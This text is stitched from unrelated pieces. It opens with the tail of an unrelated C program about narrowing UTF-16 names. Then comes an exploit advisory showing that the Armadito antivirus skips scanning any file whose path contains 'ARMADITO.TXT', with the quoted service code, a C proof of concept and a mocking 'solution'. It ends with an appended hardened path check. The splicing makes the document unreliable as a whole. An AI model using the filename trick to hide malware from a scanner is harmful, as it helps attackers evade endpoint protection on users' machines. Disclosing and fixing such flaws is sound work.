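    printf("Arabic  -> %s (%zu code units lost)\n", scratch, r);
    r = narrow_lossy(NAME_GREEK_M, COUNT(NAME_GREEK_M), scratch, sizeof scratch);
    printf("Greek M -> %s (%zu code units lost)\n", scratch, r);
    printf("exact narrow name for the Greek M case: %s\n",
           narrow_exact(NAME_GREEK_M, COUNT(NAME_GREEK_M), scratch, sizeof scratch)
               ? scratch : "(rejected, keep the UTF-16 path)");
    return 0;
}
```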
/*
# Exploit Title : Armadito antimalware - Backdoor/Bypass
# Date : 07-06-2016 (DD-MM-YYYY)
# Exploit Author : Ax.
# Vendor Homepage : http://www.teclib-edition.com/teclib-products/armadito-antivirus/
# Software Link : https://github.com/41434944/armadito-av
# Version : No version specified. Fixed 07-06-2016 post-disclosure
# Tested on : Windows 7
1. Description
Armadito is a modern antivirus developed by the French company TecLib' (http://www.teclib.com/). Looking at the source code made public a few days ago, we discovered that there was a backdoor (or a real lack of knowledge from their developers, meaning that they should reconsider working in security).
2. Proof Of Concept
As can be seen in the GitHub repository, in the file armadito-av/core/windows/service/scan_onaccess.c at line 283, an obvious backdoor has been implemented.
[SOURCE]
if (msDosFilename == NULL) {
    a6o_log(ARMADITO_LOG_SERVICE,ARMADITO_LOG_LEVEL_WARNING, " ArmaditoSvc!UserScanWorker :: [%d] :: ConvertDeviceNameToMsDosName failed :: \n",ThreadId);
    scan_result = ARMADITO_EINVAL;
}
else if (strstr(msDosFilename,"ARMADITO.TXT") != NULL) { // Do not scan the log file. (debug only)
    scan_result = ARMADITO_WHITE_LISTED;
}
else {
    // launch a simple file scan
    //printf("[+] Debug :: UserScanWorker :: [%d] :: a6o_scan :: [%s] \n",ThreadId,msDosFilename);
    scan_result = a6o_scan_simple(Context->armadito, msDosFilename, &report);
    a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_DEBUG, "[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
    printf("[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
}
[/SOURCE]
Naming a file ARMADITO.TXT-Malware.exe (or anything containing ARMADITO.TXT in its name) simply bypasses the antivirus's runtime analysis. Attached below is a small piece of code based on Armadito to reproduce the issue.
3. Solution
Stop paying developers who do not know how to deal with security. (Reading the rest of the code has been exhausting work.)
3 bis. Real solution
It seems that they have already fixed the backdoor (https://github.com/armadito/armadito-av/blob/DEV/core/windows/service/scan_onaccess.c).
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Windows.h>

#define BUFSIZE 4096
#define MAX_PATH_SIZE 255
#define ARMADITO_EINVAL 0
#define ARMADITO_WHITE_LISTED 1

char * ConvertDeviceNameToMsDosName(LPSTR DeviceFileName)
{
    char deviceDosName[BUFSIZE];
    char deviceLetter[3] = { '\0' };
    char deviceNameQuery[BUFSIZE] = { '\0' };
    char * deviceDosFilename = NULL;
    DWORD len = 0;
    DWORD len2 = 0;
    DWORD ret = 0;
    BOOL bFound = FALSE;
    char * tmp;

    if (DeviceFileName == NULL) {
        //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, " [-] Error :: ConvertDeviceNameToMsDosName :: invalid parameter DeviceName\n");
        printf("FileName null.\n");
        return NULL;
    }

    // Get the list of the logical drives.
    len = GetLogicalDriveStringsA(BUFSIZE, deviceDosName);
    if (len == 0) {
        //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: ConvertDeviceNameToMsDosName!GetLogicalDriveStrings() failed :: error code = 0x%03d", GetLastError());
        printf("Error : GetLogicalDriveStringsA()\n");
        return NULL;
    }

    tmp = deviceDosName;
    do {
        //printf("[+] Debug :: deviceDosName = %s\n",tmp);
        // Get the device letter without the backslash (Ex: C:).
        memcpy_s(deviceLetter, 2, tmp, 2);
        if (!QueryDosDeviceA(deviceLetter, deviceNameQuery, BUFSIZE)) {
            //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: QueryDosDeviceA() failed :: error code = 0x%03d\n", GetLastError());
            printf("Error : QueryDosDeviceA()\n");
            return NULL;
        }
        //printf("[+] Debug :: DeviceName = %s ==> %s\n",deviceNameQuery,deviceLetter);
        if (deviceNameQuery == NULL) {
            //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, "[-] Error :: ConvertDeviceNameToMsDosName :: QueryDosDeviceA() failed :: deviceNameQuery is NULL\n", GetLastError());
            printf("deviceNameQuery null.\n");
        }
        if (deviceNameQuery != NULL && strstr(DeviceFileName, deviceNameQuery) != NULL) {
            //printf("[+] Debug :: FOUND DeviceName = %s ==> %s\n",deviceNameQuery,deviceLetter);
            len2 = strnlen_s(deviceNameQuery, MAX_PATH_SIZE);
            len = strnlen_s(DeviceFileName, MAX_PATH_SIZE) - len2 + 3;
            deviceDosFilename = (char*)calloc(len + 1, sizeof(char));
            deviceDosFilename[len] = '\0';
            memcpy_s(deviceDosFilename, len, tmp, 3);
            memcpy_s(deviceDosFilename + 2, len, DeviceFileName + len2, len - 1);
            bFound = TRUE;
        }
        // go to the next device name.
        while (*tmp++);
        //printf("[+] Debug :: next device name = %s\n",tmp);
    } while (bFound == FALSE && *tmp);

    if (bFound == FALSE) {
        return NULL;
    }

    return deviceDosFilename;
}

int main(int argc, char ** argv)
{
    char * msDosFilename = NULL;
    int i = 0;
    LPSTR ArmaditoFile = "\\Device\\HarddiskVolume2\\ARMADITO.TXT"; /* Converted, this is C:\\ARMADITO.txt */
    LPSTR BinaryFile = "\\Device\\HarddiskVolume2\\Malware.exe"; /* Converted, this is C:\\malware.exe */
    LPSTR BinaryPOCFile = "\\Device\\HarddiskVolume2\\ARMADITO.TXT-ILoveJeromeNotin.exe"; /* Converted, this is C:\\ARMADITO.txt-ILoveJeromeNotin.exe */
    int scan_result = -1;

    /* Armadito gets the filename from message->msg.FileName; we replaced it with a simple string */
    // msDosFilename = ConvertDeviceNameToMsDosName(message->msg.FileName);

    for (i = 0; i < 3; i++)
    {
        if (i == 0)
        {
            printf("Scanning C:\\ARMADITO.txt\n");
            msDosFilename = ConvertDeviceNameToMsDosName(ArmaditoFile);
        }
        else if (i == 1)
        {
            printf("Scanning C:\\malware.exe\n");
            msDosFilename = ConvertDeviceNameToMsDosName(BinaryFile);
        }
        else
        {
            printf("Scanning C:\\ARMADITO.txt-ILoveJeromeNotin.exe\n");
            msDosFilename = ConvertDeviceNameToMsDosName(BinaryPOCFile);
        }

        //report.status = ARMADITO_CLEAN;
        /* If the ConvertDeviceNametoMsDosName fails */
        if (msDosFilename == NULL) {
            //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_WARNING, " ArmaditoSvc!UserScanWorker :: [%d] :: ConvertDeviceNameToMsDosName failed :: \n", ThreadId);
            scan_result = ARMADITO_EINVAL;
        }
        /* If it contains ARMADITO.TXT ... SERIOUSLY ? */
        else if (strstr(msDosFilename, "ARMADITO.TXT") != NULL) { // Do not scan the log file. (debug only)
            scan_result = ARMADITO_WHITE_LISTED;
            printf("This file is not suspicious. Since it contains ARMADITO.txt ........... \n");
        }
        else {
            /* Armadito basic scan */
            printf("Armadito will now scan the file.\n");
            // launch a simple file scan
            //printf("[+] Debug :: UserScanWorker :: [%d] :: a6o_scan :: [%s] \n",ThreadId,msDosFilename);
            //scan_result = a6o_scan_simple(Context->armadito, msDosFilename, &report);
            //a6o_log(ARMADITO_LOG_SERVICE, ARMADITO_LOG_LEVEL_DEBUG, "[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
            //printf("[+] Debug :: UserScanWorker :: [%d] :: %s :: %s\n", ThreadId, msDosFilename, ScanResultToStr(scan_result));
        }
        printf("\n\n");
    }

    getchar();
    return 0;
}
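A hardened form of the ARMADITO.TXT check, added here as an example (not Armadito's own fix): the shipped substring test sits beside an exact, case-insensitive comparison against the full path of the log file, which is the only file the debug shortcut was meant to skip. The log path C:\ProgramData\Armadito\ARMADITO.TXT is an assumption for this example, and the sample names are the three from the PoC above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The check as shipped: any path that merely CONTAINS the log file name
 * is skipped, so "C:\ARMADITO.TXT-ILoveJeromeNotin.exe" is never scanned. */
int skip_scan_substring(const char *path)
{
    return strstr(path, "ARMADITO.TXT") != NULL;
}

/* Case-insensitive comparison of two ASCII paths (Windows paths are not
 * case sensitive, and strcasecmp is not part of standard C). */
static int path_equal_nocase(const char *a, const char *b)
{
    for (; *a && *b; a++, b++) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    }
    return *a == '\0' && *b == '\0';
}

/* Hardened check: skip only the log file itself, identified by its full
 * path.  The location is an assumption for this example; the real
 * service would use the path it actually logs to. */
#define LOG_PATH "C:\\ProgramData\\Armadito\\ARMADITO.TXT"

int skip_scan_exact(const char *path)
{
    /* A different directory, a longer name, or a trailing suffix such as
     * "-ILoveJeromeNotin.exe" all fail the exact comparison and get scanned. */
    return path_equal_nocase(path, LOG_PATH);
}

/* Constructed inputs: the three names from the PoC plus the assumed log path. */
static const char *const SAMPLES[] = {
    "C:\\ARMADITO.TXT",
    "C:\\Malware.exe",
    "C:\\ARMADITO.TXT-ILoveJeromeNotin.exe",
    LOG_PATH,
    "c:\\programdata\\armadito\\armadito.txt",
};

int main(void)
{
    size_t i;
    for (i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++) {
        printf("%-42s substring:%-4s exact:%s\n", SAMPLES[i],
               skip_scan_substring(SAMPLES[i]) ? "skip" : "scan",
               skip_scan_exact(SAMPLES[i]) ? "skip" : "scan");
    }
    return 0;
}
```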